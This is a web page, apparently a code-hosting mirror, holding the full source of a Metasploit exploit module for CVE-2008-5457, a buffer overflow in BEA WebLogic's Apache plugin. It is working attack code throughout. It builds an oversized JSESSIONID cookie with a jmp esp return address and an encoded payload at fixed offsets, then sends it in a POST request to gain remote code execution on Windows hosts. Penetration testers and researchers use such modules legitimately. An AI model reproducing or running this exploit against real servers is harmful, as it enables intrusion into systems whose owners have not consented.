Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/http/bea_weblogic_jsessionid.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Remote::Seh1011def initialize(info = {})12super(update_info(info,13'Name' => 'BEA WebLogic JSESSIONID Cookie Value Overflow',14'Description' => %q{15This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable16code is only accessible when clustering is configured. A request containing a17long JSESSION cookie value can lead to arbitrary code execution.18},19'Author' => 'pusscat',20'References' =>21[22[ 'CVE', '2008-5457' ],23[ 'OSVDB', '51311' ],24],25'DefaultOptions' =>26{27'EXITFUNC' => 'seh',28},29'Privileged' => true,30'Platform' => 'win',31'Payload' =>32{33'Space' => 800,34'BadChars' => "\x00\x0d\x0a\x20\x3B\x3D\x2C",35'StackAdjustment' => -3500,36},37'Targets' =>38[39[ 'Windows Apache 2.2 - WebLogic module version 1.0.1136334',40{41'Ret' => 0x1006c9b5, # jmp esp42}43],44[ 'Windows Apache 2.2 - WebLogic module version 1.0.1150354',45{46'Ret' => 0x1006c9be, # jmp esp47}48],49],50'DefaultTarget' => 1,51'DisclosureDate' => '2009-01-13'))5253register_options(54[55Opt::RPORT(80)56])57end5859def exploit60sploit = Rex::Text.rand_text_alphanumeric(10000, payload_badchars)61sploit[8181, 4] = [target.ret].pack('V')62sploit[8185, payload.encoded.length] = payload.encoded6364request =65"POST /index.jsp HTTP/1.1\r\nHost: localhost\r\nCookie: TAGLINE=IAMMCLOVIN; JSESSIONID=" +66sploit +67"\r\n\r\n"6869connect70sock.put(request);71handler7273disconnect74end75end767778